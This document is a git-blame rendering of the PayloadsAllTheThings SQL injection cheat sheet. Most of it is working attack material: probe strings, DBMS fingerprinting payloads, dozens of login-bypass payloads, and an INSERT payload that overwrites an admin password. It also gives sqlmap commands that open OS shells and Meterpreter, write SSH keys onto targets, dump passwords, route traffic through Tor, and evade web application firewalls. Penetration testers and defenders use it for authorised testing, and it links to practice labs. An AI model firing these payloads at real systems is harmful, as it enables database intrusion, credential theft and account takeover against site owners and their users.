PayloadsAllTheThings/SQL Injection/README.md

573 lines
26 KiB
Markdown
Raw Normal View History

2022-10-12 10:13:55 +00:00
# SQL Injection
2018-08-12 21:30:22 +00:00
> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
Attempting to manipulate SQL queries may have goals including:
- Information Leakage
- Disclosure of stored data
- Manipulation of stored data
2022-08-09 09:02:21 +00:00
- Bypassing authorization controls
2016-10-18 08:01:56 +00:00
2018-05-16 21:33:14 +00:00
## Summary
2018-08-12 21:30:22 +00:00
2023-04-14 15:45:45 +00:00
* [CheatSheets](#cheatsheets)
* [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
* [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
* [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
* [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
* [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
* [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
* [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
2019-06-29 17:23:34 +00:00
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
2019-06-29 17:23:34 +00:00
* [Second order injection](#second-order-injection)
* [Shell](#shell)
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
* [Using TOR with SQLmap](#using-tor-with-sqlmap)
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
2021-03-24 21:26:23 +00:00
* [SQLmap without SQL injection](#sqlmap-without-sql-injection)
* [Authentication bypass](#authentication-bypass)
2020-05-24 12:09:46 +00:00
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
* [Polyglot injection](#polyglot-injection-multicontext)
2018-09-20 21:52:07 +00:00
* [Routed injection](#routed-injection)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
2023-09-03 12:26:03 +00:00
* [Generic WAF Bypass](#generic-waf-bypass)
* [White spaces alternatives](#white-spaces-alternatives)
* [No Comma Allowed](#no-comma-allowed)
* [No Equal Allowed](#no-equal-allowed)
* [Case modification](#case-modification)
2018-05-16 21:33:14 +00:00
2024-01-21 20:39:23 +00:00
## Tools
* [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
* [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
## Entry point detection
2018-08-12 21:30:22 +00:00
2016-10-18 06:39:17 +00:00
Detection of an SQL injection entry point
2018-08-12 21:30:22 +00:00
2023-09-03 12:26:03 +00:00
* **Error Messages**: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point.
* Simple characters
```sql
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
' # required for XML content
```
* Multiple encoding
```sql
%%2727
%25%27
```
* Unicode characters
```
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (')
```
* **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable.
* Merging characters
```sql
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
```
* Logic Testing
```sql
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
```
* **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable.
2018-08-12 21:30:22 +00:00
2016-10-18 06:39:17 +00:00
## DBMS Identification
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```c
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```
2024-05-26 14:32:01 +00:00
## DBMS Identification VIA Error
2024-05-26 14:40:54 +00:00
DBMS | Example Error Message | Example Payload |
|---------------------|------------------------------------------------------------------------------------------|-----------------|
| MySQL | `You have an error in your SQL syntax; ... near '' at line 1` | `'` |
| PostgreSQL | `ERROR: unterminated quoted string at or near "'"` | `'` |
| PostgreSQL | `ERROR: syntax error at or near "1"` | `1'` |
| Microsoft SQL Server| `Unclosed quotation mark after the character string ''.` | `'` |
| Microsoft SQL Server| `Incorrect syntax near ''.` | `'` |
| Microsoft SQL Server| `The conversion of the varchar value to data type int resulted in an out-of-range value.`| `1'` |
| Oracle | `ORA-00933: SQL command not properly ended` | `'` |
| Oracle | `ORA-01756: quoted string not properly terminated` | `'` |
| Oracle | `ORA-00923: FROM keyword not found where expected` | `1'` |
------------------------------------------------------------------------------------------------------------------------------------
2024-05-26 14:32:01 +00:00
2023-09-03 12:26:03 +00:00
2016-12-04 12:18:49 +00:00
## SQL injection using SQLmap
2018-08-12 21:30:22 +00:00
2023-09-03 12:26:03 +00:00
[sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers.
2018-12-14 23:51:33 +00:00
### Basic arguments for SQLmap
2018-08-12 21:30:22 +00:00
```powershell
2016-12-20 18:46:06 +00:00
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
2016-12-04 12:18:49 +00:00
```
2019-03-06 23:03:25 +00:00
### Load a request file and use mobile user-agent
```powershell
sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
```
2018-12-14 23:51:33 +00:00
### Custom injection in UserAgent/Header/Referer/Cookie
2018-08-12 21:30:22 +00:00
```powershell
2016-12-04 12:18:49 +00:00
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
2016-12-04 13:26:42 +00:00
The injection is located at the '*'
2016-12-04 12:18:49 +00:00
```
2018-12-14 23:51:33 +00:00
### Second order injection
2018-08-12 21:30:22 +00:00
```powershell
2018-02-23 12:48:51 +00:00
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
2018-12-14 23:51:33 +00:00
### Shell
2018-08-12 21:30:22 +00:00
2023-09-03 12:26:03 +00:00
* SQL Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell`
* OS Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell`
* Meterpreter: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn`
* SSH Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/`
2018-12-14 23:51:33 +00:00
### Crawl a website with SQLmap and auto-exploit
2018-10-04 17:59:11 +00:00
```powershell
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
2018-12-14 23:51:33 +00:00
### Using TOR with SQLmap
2018-10-01 14:03:07 +00:00
```powershell
sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
```
### Using a proxy with SQLmap
```powershell
sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080"
```
2018-12-14 23:51:33 +00:00
### Using Chrome cookie and a Proxy
2018-10-01 14:03:07 +00:00
```powershell
sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3
```
2018-12-14 23:51:33 +00:00
### Using suffix to tamper the injection
2018-08-12 21:30:22 +00:00
```powershell
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
2018-02-23 12:48:51 +00:00
2021-03-24 21:26:23 +00:00
2018-12-14 23:51:33 +00:00
### General tamper option and tamper's list
2018-08-12 21:30:22 +00:00
```powershell
2016-12-04 12:18:49 +00:00
tamper=name_of_the_tamper
```
| Tamper | Description |
| --- | --- |
2019-02-10 18:07:27 +00:00
|0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart |
2017-05-29 18:41:05 +00:00
|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart|
|appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
|base64encode.py | Base64 all characters in a given payload |
|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
2019-02-10 18:07:27 +00:00
|charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) |
|charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) |
|charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) |
2017-05-29 18:41:05 +00:00
|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'|
|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'|
2019-02-10 18:07:27 +00:00
|commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() |
2017-05-29 18:41:05 +00:00
|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'|
|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
|equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' |
2017-05-29 18:41:05 +00:00
|escapequotes.py | Slash escape quotes (' and ") |
|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
2019-02-10 18:07:27 +00:00
|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. -> &#39;) |
|ifnull2casewhenisnull.py | Replaces instances like IFNULL(A, B) with CASE WHEN ISNULL(A) THEN (B) ELSE (A) END counterpart|
2017-05-29 18:41:05 +00:00
|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'|
2019-02-10 18:07:27 +00:00
|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier |
|least.py | Replaces greater than operator (>) with LEAST counterpart |
|lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) |
2017-05-29 18:41:05 +00:00
|modsecurityversioned.py | Embraces complete query with versioned comment |
|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
|multiplespaces.py | Adds multiple spaces around SQL keywords |
|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters|
|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
2019-02-10 18:07:27 +00:00
|overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) |
|percentage.py | Adds a percentage sign ('%') infront of each character |
|plus2concat.py | Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart |
|plus2fnconcat.py | Replaces plus operator (+) with (MsSQL) ODBC function {fn CONCAT()} counterpart |
2017-05-29 18:41:05 +00:00
|randomcase.py | Replaces each keyword character with random case value |
|randomcomments.py | Add random comments to SQL keywords|
2019-02-10 18:07:27 +00:00
|securesphere.py | Appends special crafted string |
2017-05-29 18:41:05 +00:00
|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
|space2comment.py | Replaces space character (' ') with comments |
|space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
|space2plus.py | Replaces space character (' ') with plus ('+') |
|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
|uppercase.py | Replaces each keyword character with upper case value 'INSERT'|
|varnish.py | Append a HTTP header 'X-originating-IP' |
|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
2016-12-04 12:18:49 +00:00
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
2021-03-24 21:26:23 +00:00
### SQLmap without SQL injection
You can use SQLmap to access a database via its port instead of a URL.
```ps1
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
```
2017-05-29 18:41:05 +00:00
## Authentication bypass
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
'-'
' '
'&'
'^'
'*'
2018-05-16 21:33:14 +00:00
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
2020-04-21 09:26:49 +00:00
'--'
"--"
2020-04-21 09:31:18 +00:00
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
2017-05-29 18:41:05 +00:00
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
2020-05-27 16:53:37 +00:00
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
2020-05-24 12:09:46 +00:00
## Authentication Bypass (Raw MD5 SHA1)
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```php
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b
2020-05-24 12:09:46 +00:00
sha1("3fDf ", true) = Q<>u'='<27>@<40>[<5B>t<EFBFBD>- o<><6F>_-!
```
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
## Polyglot injection (multicontext)
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2016-10-18 06:39:17 +00:00
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
2020-07-04 17:00:56 +00:00
/* MySQL only */
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
2016-10-18 08:01:56 +00:00
```
2018-08-12 21:30:22 +00:00
## Routed injection
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
2017-05-29 18:41:05 +00:00
## Insert Statement - ON DUPLICATE KEY UPDATE
2018-08-12 21:30:22 +00:00
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
Inject using payload:
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
2017-05-29 18:41:05 +00:00
The query would look like this:
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
2017-05-29 18:41:05 +00:00
This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.
Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty".
2017-05-29 18:41:05 +00:00
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
```
2016-12-03 18:03:59 +00:00
2023-09-03 12:26:03 +00:00
## Generic WAF Bypass
2018-08-12 21:30:22 +00:00
2023-09-03 12:26:03 +00:00
### White spaces alternatives
2016-12-03 18:03:59 +00:00
2023-09-03 12:26:03 +00:00
* No space allowed (`%20`) - bypass using whitespace alternatives
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```
* No whitespace - bypass using comments
```sql
?id=1/*comment*/and/**/1=1/**/--
```
* No Whitespace - bypass using parenthesis
```sql
?id=(1)and(1)=(1)--
```
* Whitespace alternatives by DBMS
```sql
-- Example of query where spaces were replaced by ascii characters above 0x80
♀SELECT§*⌂FROM☺users♫WHERE♂1☼=¶1‼
```
| DBMS | ASCII characters in hexadicimal |
| ---------- | ------------------------------- |
| SQLite3 | 0A, 0D, 0C, 09, 20 |
| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 |
| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
| PostgreSQL | 0A, 0D, 0C, 09, 20 |
| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
2023-09-03 12:26:03 +00:00
| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 |
2023-09-03 12:26:03 +00:00
### No Comma Allowed
Bypass using OFFSET, FROM and JOIN
2018-08-12 21:30:22 +00:00
2018-05-16 21:33:14 +00:00
```sql
2016-12-04 13:26:42 +00:00
LIMIT 0,1 -> LIMIT 1 OFFSET 0
2017-05-29 18:41:05 +00:00
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
2016-12-04 13:26:42 +00:00
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
2016-12-03 18:03:59 +00:00
```
2023-09-03 12:26:03 +00:00
### No Equal Allowed
Bypass using LIKE/NOT IN/IN/BETWEEN
```sql
?id=1 and substring(version(),1,1)like(5)
?id=1 and substring(version(),1,1)not in(4,3)
?id=1 and substring(version(),1,1)in(4,3)
?id=1 and substring(version(),1,1) between 3 and 4
```
2023-09-03 12:26:03 +00:00
### Case modification
2023-09-03 12:26:03 +00:00
* Bypass using uppercase/lowercase (see keyword AND)
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
* Bypass using keywords case insensitive / Bypass using an equivalent operator
```sql
AND -> &&
OR -> ||
= -> LIKE,REGEXP, BETWEEN, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
```
2022-10-02 06:13:01 +00:00
## Labs
* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
* Detect SQLi
2018-08-12 21:30:22 +00:00
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
* MySQL:
2019-05-24 15:15:33 +00:00
* [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
2018-08-12 21:30:22 +00:00
* [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
* MSSQL:
2019-05-24 15:15:33 +00:00
* [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php)
* [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:
2019-05-24 15:15:33 +00:00
* [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* POSTGRESQL:
2019-05-24 15:15:33 +00:00
* [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* Others
2018-08-12 21:30:22 +00:00
* [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
2019-05-24 15:15:33 +00:00
* [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
* [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
* [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
* [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
* [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/)
2018-08-12 21:30:22 +00:00
* [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
* [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
* [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
2018-02-23 12:48:51 +00:00
* Second Order:
2018-08-12 21:30:22 +00:00
* [Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* Sqlmap:
2018-09-20 21:52:07 +00:00
* [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
* WAF:
* [SQLi Optimization and Obfuscation Techniques](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf) by Roberto Salgado
* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)